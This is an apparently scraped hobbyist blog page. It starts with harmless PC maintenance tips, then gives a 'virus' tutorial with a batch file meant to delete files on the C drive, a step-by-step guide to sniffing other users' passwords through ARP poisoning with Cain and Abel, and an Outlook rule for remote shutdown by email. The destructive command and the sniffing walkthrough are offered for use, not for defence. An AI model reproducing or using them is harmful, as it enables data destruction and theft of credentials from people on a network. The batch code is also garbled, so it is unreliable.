Saturday 31 August 2013

OPTIMIZE YOUR PC


1. Regular (Preventive) Maintenance

Although this seems rather obvious, a lot of people still neglect to maintain their hardware. Like with a car, if you don’t take care of it, it’ll slowly start to deteriorate. There are a few things we need to optimize your computer and to take care of it keep it up and running.

Hard Drive Space

First and foremost, make sure you still have some space left on your hard drive. I know a lot of people who operate at, or even above 95% of maximum storage capacity. Not only does this give you little breathing room, your computer will also run slower because of it. Admit it, you don’t need half of what’s stored on your hard drive right now. So get rid of it.

Defragmenting

When using a hard drive, space is used wherever available. As such, some files are fragmented all over the disk. The defragment utility analyzes your hard drive, and attempts to consolidate those fragmented files, in an attempt to optimize your computer and speed up your system.

Friday 22 February 2013

HOW TO CREATE A VIRUS


3. Creating Virus That Format C Drive

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
  
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

How To Sniff Passwords With Cain And Abel
Download Cain and Abel Here: http://www.oxid.it/downloads/ca_setup.exe
Run Cain and Abel as administrator
Go to the tab that says sniffer
Go to the upper right corner under the Cain picture and enable the sniffer
select your adapter (usually the one that has a listed Ip address)
Click of the blue Plus sign
Leave everything as is and press ok
Right click on each of ip addresses that come up
Resolve the host name for each one of them
Go to the bottom of the screen and hit the APR tab
Click on the top box
Click the blue plus sign
Hind the computer you want get passwords/information from in the left hand box
Highlight everything that comes up in the righthand box
Go to the upper right hand corner, by the sniffer and enable the APR poisener
To Find passwords, go to the bottem of the screen where it says passwords
Here you will find all usernames and passwords of the person you have poisened (Most
of the passwords will be in HTTP)



STEPS TO SHUT DOWN A COMPUTER BY JUST SENDING AN E-MAIL


TO Shutdown a Computer with a Cell Phone
Using this method, a user can shutdown, restart, hibernate, etc. his or her computer,
just by sending an email from his or her phone.
To do this, all you will need is Microsoft Outlook which should come with Microsoft
Office, which most people have. This will need to be on the computer wish you wish to
shutdown.
So, this is how you do this:
1. First, you need the batch files to perform the Shutdown, Hibernate etc. You can
write them down yourselves or can download them from here.
2. Extract them to your C:\ drive so the path to the shutdown batch file is
C:\sms_functions\shutdown.bat (Important this is a must the path must be exact)
or you can modify the rule once you import it to point to the new destination, it's
your call.
3. Open up Microsoft Outlook. Make sure that you have already configured it for
your email.Now we will need to make it so that Outlook checks your inbox about every
minute (1 minute for testing time can be increased if a delayed shutdown is desired).
You can do this by going to Tools: Options.
4. Then click the Mail Setup tab, and afterwards, the Send/Receive button.
5. Make sure that the Schedule an automatic send/receive every... box is checked,
and set the number of minutes to 1. Now you may close all of these dialog boxes.
6. Now go to Tools: Rules and Alerts... Next click the options button in the upper
right hand corner and press the Import Rules button.
7. Now select the shutdown.rwz file that was found in the zip file named
sms_functions that you downloaded.
8. Now, when you send a message from your phone to your e-mail address with the
subject smsshutdown%%, your computer will shutdown.
You can also make your own rule, so that you can use your own batch file, and may
specify the phrase you want to trigger the action.